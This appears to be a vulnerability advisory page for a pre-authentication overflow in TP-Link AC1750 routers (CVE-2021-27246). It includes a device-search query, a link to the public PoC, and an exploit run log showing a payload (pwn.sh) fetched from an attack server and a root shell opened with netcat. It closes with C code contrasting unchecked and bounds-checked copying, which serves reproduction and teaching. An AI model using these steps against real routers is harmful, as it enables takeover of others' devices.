# TP-Link AC1750 Pre-Authentication Remote Code Execution Vulnerability CVE-2021-27246

## Vulnerability Description

The tdpServer daemon on the TP-Link AC1750 contains a vulnerability: the size of incoming JSON data is not checked, which causes a buffer overflow, and the overflow can be turned into code execution.

Further reading:

- https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html

## Network Mapping

```
app="TP_LINK-AC1750"
```

## Vulnerability Reproduction

- PoC: https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020

```
$ bash exploit.sh
[+] Launching web server for distribution of pwn.sh
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
INFO:tdpwn:Associating 49 onemesh clients...
INFO:tdpwn:Done! And wait for 80 seconds...
80 seconds left...
70 seconds left...
60 seconds left...
50 seconds left...
40 seconds left...
30 seconds left...
20 seconds left...
10 seconds left...
[+] Trying to exploit the tddp injection
INFO:tdp:Preparing tddpv1_configset payload
INFO:tdp:Sending payload
[+] Trying the root shell (Low probability of success...)
nc -v 192.168.0.1 12345
nc: connect to 192.168.0.1 port 12345 (tcp) failed: Connection refused
[ ] If shell hasn't succeed, don't worry, we retry
INFO:tdpwn:Associating 49 onemesh clients...
INFO:tdpwn:Done! And wait for 80 seconds...
80 seconds left...
70 seconds left...
60 seconds left...
50 seconds left...
40 seconds left...
30 seconds left...
20 seconds left...
10 seconds left...
[+] Trying to exploit the tddp injection
INFO:tdp:Preparing tddpv1_configset payload
INFO:tdp:Sending payload
192.168.0.1 - - [30/Nov/2020 12:10:59] "GET /pwn.sh HTTP/1.1" 200 -
[+] Trying the root shell (High probability of success...)
nc -v 192.168.0.1 12345
Connection to 192.168.0.1 12345 port [tcp/*] succeeded!
uname -a
Linux ArcherA7v5 3.3.8 #1 Mon Sep 14 19:52:46 CST 2020 mips GNU/Linux
id
uid=0(root) gid=0(root)
^C[-] Stopping Webserver, now Terminated
```
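The defect class described above (a JSON string value copied into a fixed-size buffer with no size check) as an added illustration; this is hypothetical code written for this page, not tdpServer's actual source, and the buffer size and function names are assumptions. It shows the unchecked copy next to the hardened version that rejects oversized values before copying.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical field size; the real tdpServer buffer layout is not given on this page. */
#define FIELD_MAX 32

/* Vulnerable pattern: the value of a JSON string field is copied into a
 * fixed-size stack buffer without checking its length. A value longer than
 * the buffer overwrites whatever follows it on the stack. */
int handle_field_unchecked(const char *value)
{
    char buf[FIELD_MAX];
    strcpy(buf, value);            /* no bound: this is the defect */
    return (int)strlen(buf);
}

/* Hardened pattern: measure the value first and refuse the message if it
 * does not fit, leaving room for the terminating NUL; then copy a known
 * number of bytes rather than trusting the input to stop in time. */
int handle_field_checked(const char *value)
{
    char buf[FIELD_MAX];
    size_t len = strlen(value);
    if (len >= FIELD_MAX)
        return -1;                 /* too long: reject instead of overflowing */
    memcpy(buf, value, len + 1);   /* bounded copy including the NUL */
    return (int)len;
}

int main(void)
{
    /* Constructed sample values: one that fits, one that does not. */
    const char *ok = "client-01";
    char big[FIELD_MAX * 4];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    printf("checked(ok)  = %d\n", handle_field_checked(ok));   /* 9 */
    printf("checked(big) = %d\n", handle_field_checked(big));  /* -1 */
    /* handle_field_unchecked(big) would corrupt the stack, so it is not called. */
    return 0;
}
```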